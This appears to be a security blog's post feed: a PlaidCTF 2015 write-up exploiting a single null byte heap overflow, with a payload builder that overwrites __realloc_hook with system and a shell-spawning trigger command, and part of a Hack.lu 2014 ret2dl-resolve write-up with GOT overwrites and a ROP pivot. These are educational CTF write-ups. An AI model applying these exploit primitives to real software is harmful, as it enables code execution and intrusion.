<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">get</span><span class="p">(</span><span class="n">b</span><span class="s">"x"</span> <span class="o">*</span> <span class="mh">0x100</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/leak.png" alt="trigger corruption stage 3" /></a></p>
<p>The end of the key used for the look-up uses the same memory as the data it’s
fetching. When this <code class="highlighter-rouge">realloc</code> happens some meta-data is updated. In particular,
since we took a piece of a supposedly large free chunk, the header of what
remains of this chunk after the allocation needs to be written. This is in the
middle of the data. <strong>When the application prints the data we request it will
leak this header.</strong> Before returning the data to the user the temporary key is
freed.</p>
<p>The header in question has some pointers to other parts of the heap and also to
some values used by malloc that are stored inside the libc. <strong>We successfully
bypassed ASLR</strong> by leaking heap and libc addresses.</p>
<h1 id="alternatives-to-the-unlink-reaction">Alternatives to the unlink reaction</h1>
<p>We now control the heap, not entirely, but it’s enough of a mess to be able to
make some interesting constructions. We need to start thinking about what we
want to achieve with this. The next step is gaining control over the execution
flow.</p>
<p>The classic approach when exploiting structures like linked lists or trees is to
fall back to the old unlink-style <em>write-almost-what-almost-where</em> primitive. The
code for deleting elements in such data structures looks like this:</p>
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">to_be_deleted</span><span class="o">-></span><span class="n">next</span><span class="o">-></span><span class="n">prev</span> <span class="o">=</span> <span class="n">to_be_deleted</span><span class="o">-></span><span class="n">prev</span><span class="p">;</span>
<span class="n">to_be_deleted</span><span class="o">-></span><span class="n">prev</span><span class="o">-></span><span class="n">next</span> <span class="o">=</span> <span class="n">to_be_deleted</span><span class="o">-></span><span class="n">next</span><span class="p">;</span>
</code></pre></div></div>
<p>We could confuse the program and commandeer a node; once it is deleted
we’ll have something looking like the code above. But there is an inherent
limitation to this style of <em>write-what-where</em>: It’s done in two directions, this
means the value we are writing must be a pointer to writable memory, because the
address we are writing to will be written back to what the value points to. Read
that again if you didn’t get it. In short with this technique you can’t
overwrite a function pointer with a code address because executable memory won’t be writable.</p>
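<p>The two-directional nature of the write is easier to see in a toy model. Everything below is hypothetical: the field offsets, the addresses and the idea that only one address range is writable are chosen purely for illustration.</p>

```python
NEXT_OFF, PREV_OFF = 0, 8  # hypothetical field offsets inside a list node

NODE = 0x602000    # hypothetical address of the node we commandeered
TARGET = 0x601018  # hypothetical address we would like to overwrite


class Segfault(Exception):
    """Raised when the model writes to non-writable memory."""


def is_writable(address):
    # Toy memory map: data and heap are writable, code at 0x400000 is not.
    return 0x600000 <= address < 0x700000


def unlink(memory, node):
    """Perform the two mirrored writes of a doubly linked list removal."""
    nxt = memory[node + NEXT_OFF]
    prv = memory[node + PREV_OFF]
    for address, value in ((nxt + PREV_OFF, prv), (prv + NEXT_OFF, nxt)):
        if not is_writable(address):
            raise Segfault(hex(address))
        memory[address] = value


def forged_unlink(value):
    """Unlink a node forged so that `value` gets written to TARGET."""
    memory = {NODE + NEXT_OFF: TARGET - PREV_OFF, NODE + PREV_OFF: value}
    unlink(memory, NODE)
    return memory


# A pointer into writable memory works: both writes succeed.
print(hex(forged_unlink(0x603000)[TARGET]))

# A pointer into code fails on the mirrored write.
try:
    forged_unlink(0x400800)
except Segfault as fault:
    print("segfault writing to", fault)
```

<p>The first write puts our value at the target, but the second one writes back through that very value, which is what rules out code addresses.</p>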
<p>Another write-up for this challenge written by frizn can be found <a href="http://blog.frizn.fr/pctf-2015/pwn-550-plaiddb">here</a>; he
chose to solve this problem.</p>
<p>But before we go through the trouble of finding something we can control
the execution flow with using this technique, let’s take a moment to check if
something else is easier. To be honest I never reverse engineered the function
handling <code class="highlighter-rouge">del</code> in the target binary. One function I did look at (because it was
way smaller and I’m lazy) is the one doing the work for <code class="highlighter-rouge">put</code>. This is an
excerpt:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">old_node</span> <span class="o">=</span> <span class="n">add_node</span><span class="p">(</span><span class="n">new_node</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">old_node</span> <span class="p">)</span> <span class="p">{</span>
<span class="n">free</span><span class="p">(</span><span class="n">new_node</span><span class="o">-></span><span class="n">key</span><span class="p">);</span>
<span class="n">free</span><span class="p">(</span><span class="n">old_node</span><span class="o">-></span><span class="n">val</span><span class="p">);</span>
<span class="n">old_node</span><span class="o">-></span><span class="n">datasz</span> <span class="o">=</span> <span class="n">new_node</span><span class="o">-></span><span class="n">datasz</span><span class="p">;</span>
<span class="n">old_node</span><span class="o">-></span><span class="n">val</span> <span class="o">=</span> <span class="n">new_node</span><span class="o">-></span><span class="n">val</span><span class="p">;</span>
<span class="n">free</span><span class="p">(</span><span class="n">new_node</span><span class="p">);</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"info: update successful."</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"info: insert successful."</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>When a key is already present in the database it updates the associated value
before freeing the <code class="highlighter-rouge">new_node</code>. My idea was to make it believe there is a node
located where I want to write to. It’ll overwrite my target with the size of the
new data we’re sending and with a pointer to this data. But you’ll see later
that we can subvert this limitation.</p>
<h4 id="how-do-we-setup-a-fake-node-anywhere-in-memory">How do we set up a fake node anywhere in memory?</h4>
<p>This is surprisingly easy: we just need to overwrite an existing node and set
its <code class="highlighter-rouge">left</code> or <code class="highlighter-rouge">right</code> pointer to where we want our fake node to be. The only
requirement is that the first entry of our fake node should be a valid pointer,
because this is supposed to be the key.</p>
<p>We’ll be able to update this node by using the <code class="highlighter-rouge">PUT</code> operation with a key
matching whatever the first pointer in our phony node happens to point to.</p>
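<p>Here is a rough sketch of that idea on a toy memory model. The field offsets follow the payload used later in this article (key, size, data, left, right); the tree ordering, the addresses and the helper names <code class="highlighter-rouge">find</code> and <code class="highlighter-rouge">put</code> are assumptions for the sake of the example, not the binary’s actual code.</p>

```python
# Toy model of the "key already present" path of PUT.
KEY, DATASZ, VAL, LEFT, RIGHT = 0, 8, 16, 24, 32  # offsets inside a node


def find(mem, strings, root, key):
    """Walk the tree, comparing `key` with the string each node's key points to."""
    node = root
    while node:
        current = strings[mem[node + KEY]]
        if key == current:
            return node
        # Assumed ordering: smaller keys go left, bigger keys go right.
        node = mem[node + LEFT] if key < current else mem[node + RIGHT]
    return 0


def put(mem, strings, root, key, datasz, val):
    """Only the update branch of the excerpt above."""
    old_node = find(mem, strings, root, key)
    if old_node:
        mem[old_node + DATASZ] = datasz
        mem[old_node + VAL] = val
    return old_node


target = 0x7000      # made-up address we want to overwrite
fake = target - VAL  # place the fake node so that fake->val is `target`
root = 0x1000        # a real node whose left pointer we corrupted

strings = {0x100: b"m", 0x200: b"a"}  # 0x200: the pointer that happens to sit at `fake`
mem = {
    root + KEY: 0x100, root + LEFT: fake, root + RIGHT: 0,
    fake + KEY: 0x200, fake + DATASZ: 0, fake + VAL: 0,
    fake + LEFT: 0, fake + RIGHT: 0,
}

put(mem, strings, root, b"a", 0, 0xDEADBEEF)
print(hex(mem[target]))
```

<p>The lookup follows the corrupted <code class="highlighter-rouge">left</code> pointer, accepts the fake node because the key matches, and the update then writes straight over the target.</p>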
<h4 id="how-do-we-overwrite-with-an-arbitrary-value">How do we overwrite with an arbitrary value?</h4>
<p>What I explained before is that the value being written is the size of the data
and the pointer to the data. Those aren’t arbitrary. But we get around this
thanks to the particular heap setup we’ll be using. We’ll have a large controlled
(data) block that overlaps the node we’ll be tampering with in order
to set up our fake node over the target. This same large controlled block will
also overlap its own key, the one used to do the <code class="highlighter-rouge">PUT</code>. Because of this we’ll
be able to set the size and data fields to whatever we want before they are
copied to the fake node located at our target.</p>
<h4 id="putting-it-together">Putting it together</h4>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/overwrite.png" alt="trigger corruption stage 3" /></a></p>
<p>The temporary node is created in the middle because of a fastbin of the right
size, then the key goes to the left and the data takes the remaining space because we
made it just big enough. On the screenshot of villoc you can clearly see the
different overwrites: first we overwrite some data in the middle, followed by our
own temporary node, and finally we overwrite a node that already existed. We’ll
make the latter point to our target and set up the temporary node to point to a key
containing the right data.</p>
<p>The code below creates the huge data with all the right values:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Align on a multiple of 16 so the pointer passed to free() is valid.
</span><span class="n">overwrite</span> <span class="o">=</span> <span class="n">b</span><span class="s">"0"</span> <span class="o">*</span> <span class="mi">8</span>
<span class="c1"># Craft a fake freeable key
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x101</span><span class="p">)</span> <span class="c1"># keep malloc happy
</span><span class="n">fake_key</span> <span class="o">=</span> <span class="n">data</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">overwrite</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">target_key</span> <span class="o">+</span> <span class="n">b</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span>
<span class="n">overwrite</span> <span class="o">=</span> <span class="n">overwrite</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x100</span><span class="p">,</span> <span class="n">b</span><span class="s">"0"</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="c1"># padding
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x101</span><span class="p">)</span> <span class="c1"># keep malloc happy
</span>
<span class="c1"># This puts us at the beginning of our own node.
# This is the temporary node for the PUT.
</span><span class="n">overwrite</span> <span class="o">=</span> <span class="n">overwrite</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x438</span><span class="p">,</span> <span class="n">b</span><span class="s">"1"</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">)</span> <span class="c1"># keep malloc happy
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="n">fake_key</span><span class="p">)</span> <span class="c1"># we need to craft a key.
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">)</span> <span class="c1"># size
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="n">system</span><span class="p">)</span> <span class="c1"># This will be written to target.
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x525252</span><span class="p">)</span> <span class="c1">#
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x525253</span><span class="p">)</span> <span class="c1">#
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x525254</span><span class="p">)</span> <span class="c1">#
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="c1"># padding
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x201</span><span class="p">)</span> <span class="c1"># keep malloc happy
</span>
<span class="c1"># Now get to the next node, we'll make it point to our target.
</span><span class="n">overwrite</span> <span class="o">=</span> <span class="n">overwrite</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x608</span><span class="p">,</span> <span class="n">b</span><span class="s">"T"</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">)</span> <span class="c1"># keep malloc happy
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="n">www</span><span class="p">)</span> <span class="c1"># we need a freeable key.
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="n">target</span><span class="o">-</span><span class="mi">16</span><span class="p">)</span><span class="c1"># left->data == target
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x626262</span><span class="p">)</span> <span class="c1"># right
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x626263</span><span class="p">)</span> <span class="c1"># parent
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="c1"># Don't include the final \n as we normally do.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"setup"</span><span class="p">,</span> <span class="n">overwrite</span><span class="p">,</span> <span class="n">trim</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
</code></pre></div></div>
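<p>The values tagged “keep malloc happy” are chunk size fields. In glibc the three low bits of that field are flags, so <code class="highlighter-rouge">0x101</code> is a chunk of size <code class="highlighter-rouge">0x100</code> whose previous chunk is marked as in use. The small helper below (a name I made up for this illustration) decodes the values used above; which of glibc’s sanity checks each value actually satisfies depends on the libc version, so take it as a reading aid only.</p>

```python
import struct

# Flag bits stored in the low bits of a glibc chunk size field.
PREV_INUSE, IS_MMAPPED, NON_MAIN_ARENA = 0x1, 0x2, 0x4


def describe_size_field(raw):
    """Split an 8-byte little-endian size field into (chunk size, flag names)."""
    (field,) = struct.unpack("<Q", raw)
    names = ((PREV_INUSE, "PREV_INUSE"),
             (IS_MMAPPED, "IS_MMAPPED"),
             (NON_MAIN_ARENA, "NON_MAIN_ARENA"))
    flags = [name for bit, name in names if field & bit]
    return field & ~0x7, flags


for value in (0x101, 0x41, 0x201):
    size, flags = describe_size_field(struct.pack("<Q", value))
    print(hex(value), "->", hex(size), flags)
```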
<p>The only thing left to do is find a suitable target and value. This is rather
easy. We’ll target <code class="highlighter-rouge">__realloc_hook</code> and overwrite it with <code class="highlighter-rouge">system</code>. This matches
our requirements because there is a valid pointer at the right offset before
<code class="highlighter-rouge">__realloc_hook</code> that can be used as the key.</p>
<p>Let’s look at what happens during the <code class="highlighter-rouge">PUT</code>:</p>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/overwrite_followup.png" alt="trigger corruption stage 3" /></a></p>
<p>The first line is the allocation of the data that overwrites everything. Next we
see that <strong>villoc points out there is an error</strong> because we are freeing an
unknown chunk. This is the fake key we created: the update is done and it is no
longer needed. This is why it was so important that it was freeable. We succeeded
because <code class="highlighter-rouge">free()</code> didn’t complain or crash. You can see villoc marks the unknown
chunk dashed and it matches where we built our fake key near the beginning of our
huge data.</p>
<p>On the next line nothing seems to happen, it’s a <code class="highlighter-rouge">free(0x0)</code>. We didn’t bother
setting up a valid value for the data pointer of the temporary node after we
overwrote it and just set it to null. Finally the temporary node itself is
freed.</p>
<h4 id="now-we-get-a-shell">Now we get a shell</h4>
<p>We are almost there! Now whenever we cause a call to <code class="highlighter-rouge">realloc()</code> the hook we
installed will cause <code class="highlighter-rouge">system()</code> to be called. Its first argument will be the
same as <code class="highlighter-rouge">realloc</code>’s: the key being re-allocated.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Now we control __realloc_hook, trigger it.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"sh < /dev/stdout;"</span> <span class="o">+</span> <span class="n">b</span><span class="s">":;"</span> <span class="o">*</span> <span class="mi">100</span><span class="p">,</span> <span class="n">b</span><span class="s">"foo"</span><span class="p">)</span>
</code></pre></div></div>
<h1 id="comments-and-advice">Comments and advice</h1>
<p>When working on complex data structures, be it the heap or something else, it is
important to have a good understanding of what is going on. Visualization is
essential, at least for me it is. I wrote <a href="http://github.com/wapiflapi/villoc">villoc</a> during PlaidCTF 2015 to
solve the challenge presented in this article. I made some patches afterwards to
fix some bugs, but this is nowhere near how good it could be. This version won’t
handle large programs well and it doesn’t show a lot of interesting
information. For example it would be great to have something with pintools or
even a simple shared library that could do inspection to show what data is
stored where.</p>
<p>In exploitation in general never despair when you don’t even control what you
control. Systems are so complex that even the tiniest corruptions can often be
leveraged in the right context. Your job as a designer is to understand what is
going on and master the system enough to be able to create this context.</p>
<blockquote>
<p>In virtuality there is no level of privilege, no logical barrier between
systems, no point of illegality. There is only information and those that can
invoke it. – Phantasmal Phantasmagoria</p>
</blockquote>wapiflapiWhen Phantasmal Phantasmagoria wrote The Malloc Malleficarum back in 2005 he exposed several ways of gaining control of an exploitation through corruption of the internal state of the libc memory allocator. Ten years later people are still exploring the possibilities offered by such complex data structures. In this article I will present how I solved a challenge from Plaid CTF 2015 and the tool I wrote in the process.Giving Jekyll a shot2015-01-04T00:00:00+00:002015-01-04T00:00:00+00:00https://wapiflapi.github.io/2015/01/04/giving-jekyll-a-shot<p>I’m not sure about this but since it seems to be all the hype these days I might
as well give it a try. At first I was under the impression I would miss RsT, but
then I thought what the heck, I need to get used to Markdown anyway with
everyone on github using that.</p>
<p>I’m trying the Jekyll @poole theme by @mdo, I think it’s quite to my liking even
if I had to do some modifications to fit my username as the title of the blog
without it overflowing on the content.</p>
<p>I’ve re-edited some of my previous articles in markdown and uploaded them
here. I plan to host my future writeups and thoughts here. I’ll be able to host
the associated resources on the repo as well instead of having them scattered
all around the internet which is probably a good thing.</p>Wannes RomboutsI’m not sure about this but since it seems to be all the hype these days I might as well give it a try. At first I was under the impression I would miss RsT, but then I thought what the heck, I need to get used to Markdown anyway with everyone on github using that.Hack.lu’s OREO with ret2dl-resolve2014-11-17T00:00:00+00:002014-11-17T00:00:00+00:00https://wapiflapi.github.io/2014/11/17/hacklu-oreo-with-ret2dl-resolve<p>Hack.lu 2014 was really well done and entertaining. For one challenge we needed
to get <code class="highlighter-rouge">system</code> from an unknown libc while bypassing ASLR. The return to
dl-resolve technique I used wasn’t known to me and I will explain it in this
post.</p>
<p>This exploit took me a ridiculous amount of time during the CTF and is overkill
in more than one place. Nevertheless the write-up should be interesting because
the technique known as return to dl-resolve wasn’t known to me before and seems
to only be mentioned in Phrack Volume 0x0b, Issue 0x3a, Phile #0x04 and in a
<a href="http://inaz2.hatenablog.com/entry/2014/07/27/205322">Japanese writeup</a> that I
didn’t quite understand because I don’t speak Japanese.</p>
<p>Here are some links to the challenge
<a href="https://github.com/ctfs/write-ups/tree/master/hack-lu-ctf-2014/oreo">binary</a>,
the original <a href="http://hastebin.com/kogepozuhe.py">exploit</a> I used during the ctf
and <a href="https://github.com/wapiflapi/binexpect">binexpect</a>.</p>
<p>I won’t cover the details of the fastbin exploit since that part is trivial;
reading the Maleficarum is the only thing required. I will cover the rest of my
exploit, even the less interesting parts, because some of them might be overkill
enough to be amusing.</p>
<h3 id="some-stats-about-the-problem">Some stats about the problem:</h3>
<ul>
<li><strong>32 bit</strong>. Yes, I know it’s 2014, tell hack.lu organizers ;-)</li>
<li><strong>CANARY, NX, ASLR, NO PIE</strong></li>
<li><strong>Unknown libc</strong>, this of course I didn’t notice until my exploit didn’t
work on the remote and I had to start over again doing things differently.</li>
<li>We have a pretty easy to use and repeatable leak primitive.</li>
</ul>
<h1 id="controlling-the-stack-twice">Controlling the stack (twice)</h1>
<p>Once the <em>House of Spirit</em> gives us control over the next pointer returned by <code class="highlighter-rouge">malloc</code>,
one of the easiest ways to acquire execution control is to make it return an
address somewhere near the beginning of the GOT so you can overwrite it as per
usual.</p>
<p>From there you want to trigger your stack pivot so that you have a little more
stack space to play with.</p>
<p>There is a very nice gadget at 0x08048b42 which does <code class="highlighter-rouge">add esp, 0x1c ; pop3;
ret</code>. This does exactly what we want when called in place of <code class="highlighter-rouge">scanf</code> because it
will move the stack right into the buffer containing what we just typed at the
prompt (and we can trigger this as many times as we want.) Guess what? Yep,
didn’t see that one during the CTF. I did something <em>way</em> more complicated.</p>
<p>Here is what the GOT looked like after my overwrite:</p>
<table>
<thead>
<tr>
<th>original GOT</th>
<th>overwritten</th>
<th> </th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="highlighter-rouge">link_map</code></td>
<td>target</td>
<td>target stack</td>
</tr>
<tr>
<td><code class="highlighter-rouge">dl-resolve</code></td>
<td><code class="highlighter-rouge">0x08048ae3</code></td>
<td><code class="highlighter-rouge">pop ebp; ret;</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">printf</code></td>
<td><code class="highlighter-rouge">printf</code></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">free</code></td>
<td><code class="highlighter-rouge">0x08048450</code></td>
<td><code class="highlighter-rouge">push link_map; jmp dl-resolve</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">fgets</code></td>
<td><code class="highlighter-rouge">fgets</code></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">__stack_chk_fail</code></td>
<td><code class="highlighter-rouge">0x0804844c</code></td>
<td><code class="highlighter-rouge">leave; ret;</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">malloc</code></td>
<td><code class="highlighter-rouge">malloc</code></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">puts</code></td>
<td><code class="highlighter-rouge">puts</code></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">__gmon_start__</code></td>
<td><em>garbage</em></td>
<td>clobbered w/ final nullbyte.</td>
</tr>
<tr>
<td><code class="highlighter-rouge">strlen</code></td>
<td><em>untouched</em></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">__libc_start_main</code></td>
<td><em>untouched</em></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">__isoc99_sscanf</code></td>
<td><em>untouched</em></td>
<td> </td>
</tr>
</tbody>
</table>
<p>Notice the pointers to <code class="highlighter-rouge">link_map</code> and the <code class="highlighter-rouge">dl-resolve</code> function which aren’t
usually considered part of the GOT but are located right in front of it.</p>
<p>The way this pivot works is as follows. On the next call to <code class="highlighter-rouge">free</code>, <em>target</em>
will be pushed on the stack and instead of dl-resolve our <code class="highlighter-rouge">pop ebp; ret</code> will be
executed and return control to the original program. After some instructions the
canary is checked relative to ebp; of course it doesn’t match anymore and we
regain control through our overwrite of <code class="highlighter-rouge">__stack_chk_fail</code>. Because we now
control ebp we simply end with a classic <code class="highlighter-rouge">leave; ret;</code> which pivots our stack.</p>
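<p>If the last step isn’t obvious, here is what <code class="highlighter-rouge">leave; ret</code> does once ebp is ours, replayed on a toy 32-bit machine. The register dictionary, the addresses and the helper name are invented for the illustration; only the instruction semantics are real.</p>

```python
def leave_ret(regs, mem):
    """x86 `leave; ret` on a toy 32-bit machine with 4-byte stack slots."""
    regs["esp"] = regs["ebp"]       # leave: mov esp, ebp
    regs["ebp"] = mem[regs["esp"]]  #        pop ebp
    regs["esp"] += 4
    regs["eip"] = mem[regs["esp"]]  # ret:   pop eip
    regs["esp"] += 4


target = 0x0804A000  # hypothetical address of the fake stack
mem = {
    target: 0x41414141,      # first slot is popped into ebp
    target + 4: 0x08048000,  # hypothetical first gadget of the chain
}
regs = {"esp": 0xFFFFD000, "ebp": target, "eip": 0}

leave_ret(regs, mem)
print({name: hex(value) for name, value in regs.items()})
```

<p>After the two instructions esp points right behind the slots we prepared, so every following <code class="highlighter-rouge">ret</code> keeps consuming data from memory we control.</p>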
<p>We now control where the stack points to. As we will see later my final ropchain
has some data with it so I needed somewhere to store it. The only large buffer
at a known address is the one where the message is normally stored. The trouble
with this is that it is too close to the GOT and when the stack grows it ends up
overwriting important entries such as <code class="highlighter-rouge">malloc</code> which isn’t acceptable for our
exploit. So I decided to go with a small loader that I stored on the heap during
the initial preparations for the House of Spirit, I know the address of this
because it is very easy to leak.</p>
<table>
<thead>
<tr>
<th>ropchain</th>
<th> </th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="highlighter-rouge">finalstack</code></td>
<td>ebp == some location in the middle of the heap</td>
</tr>
<tr>
<td><code class="highlighter-rouge">fgets</code></td>
<td><code class="highlighter-rouge">fgets(finalstack, 1025, stdin)</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">0x0804844c</code></td>
<td><code class="highlighter-rouge">leave; ret;</code></td>
</tr>
<tr>
<td><code class="highlighter-rouge">finalstack</code></td>
<td>this is also where we write to</td>
</tr>
<tr>
<td><code class="highlighter-rouge">1025</code></td>
<td> </td>
</tr>
<tr>
<td><code class="highlighter-rouge">stdin</code></td>
<td> </td>
</tr>
</tbody>
</table>
<p>After this we control the stack for real. We can simply send our ropchain and
take up as much space as we want.</p>
<h1 id="getting-a-shell">Getting a shell</h1>
<p>A lot of the work until now was getting a nice stack to play with. In the first
version of this exploit I didn’t do any of this because I thought I could just
guess which libc was running based on the addresses I leaked from the GOT and
simply return to system at some point. But, in the challenge’s author’s own
words:</p>
<blockquote>
<p>cutz: yea the libc is self compiled [and] guessing offset sucks ^^</p>
</blockquote>
<p>So. Let’s get thinking, unknown libc and ASLR. Sounds familiar? Wasn’t to me.
As it turns out there are a couple of quite simple solutions (see at the end of
this writeup). But you know, it’s way more fun to go with the trick that no one
has been using since 2001, especially during a 48h CTF that is scheduled in the middle
of the goddamn week when I’m supposed to be working.</p>
<h2 id="return-to-dl-resolve">Return to dl-resolve</h2>
<p>After some other wild ideas that obviously didn’t work or I would be writing
about them instead, it dawned upon me that this had to be a solved problem. If
system (which is what I really wanted to call) had been used in the binary how
would its address end up in the GOT the first time it’s called anyway? Looking
this up is a matter of googling; the initial call to a library function ends up
calling <code class="highlighter-rouge">dl-resolve</code> and passing it an index into the binary’s (not library’s!)
relocation table and a pointer to something called <code class="highlighter-rouge">link_map</code>. While googling I
also noticed the Japanese
<a href="http://inaz2.hatenablog.com/entry/2014/07/27/205322">writeup</a> that mentioned
this technique so I was pretty sure this would work.</p>
<p>I guess if it simply passed the symbol’s name it would be too easy, right?
Instead it uses the relocation entry to get an index into a symbol table which
in turn yields an index in the string table which gives it the function’s
name. This name is then used to resolve the symbol in the library. How does it
get the library? Well link_map is a linked list of all loaded libraries, it
finds it in there.</p>
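<p>The chain of lookups can be sketched on a tiny synthetic image. This is not the dynamic linker’s code, just the three hops it performs to get from a relocation to a name; the table offsets and contents are made up, and I treat the argument as a byte offset into the relocation table, which is my understanding of how i386 does it. The struct layouts and <code class="highlighter-rouge">ELF32_R_SYM</code> are the ones from <code class="highlighter-rouge">elf.h</code>.</p>

```python
import struct

SYM_SIZE = 16     # sizeof(Elf32_Sym)
R_386_JMP_SLOT = 7


def resolve_name(image, jmprel, symtab, strtab, reloc_offset):
    """Follow relocation -> symbol -> name inside `image` (a bytes object)."""
    # Elf32_Rel is two 32-bit words: r_offset, r_info.
    _r_offset, r_info = struct.unpack_from("<II", image, jmprel + reloc_offset)
    sym_index = r_info >> 8  # ELF32_R_SYM(r_info)
    # Elf32_Sym starts with st_name, an offset into the string table.
    (st_name,) = struct.unpack_from("<I", image, symtab + sym_index * SYM_SIZE)
    start = strtab + st_name
    return image[start:image.index(b"\x00", start)]


# Made-up layout: three small tables packed into 0x100 bytes.
JMPREL, SYMTAB, STRTAB = 0x00, 0x40, 0x80
image = bytearray(0x100)
image[STRTAB:STRTAB + 13] = b"\x00puts\x00system\x00"
struct.pack_into("<I", image, SYMTAB + 1 * SYM_SIZE, 1)  # symbol 1 -> "puts"
struct.pack_into("<I", image, SYMTAB + 2 * SYM_SIZE, 6)  # symbol 2 -> "system"
struct.pack_into("<II", image, JMPREL + 0, 0x0804A00C, (1 << 8) | R_386_JMP_SLOT)
struct.pack_into("<II", image, JMPREL + 8, 0x0804A010, (2 << 8) | R_386_JMP_SLOT)
image = bytes(image)

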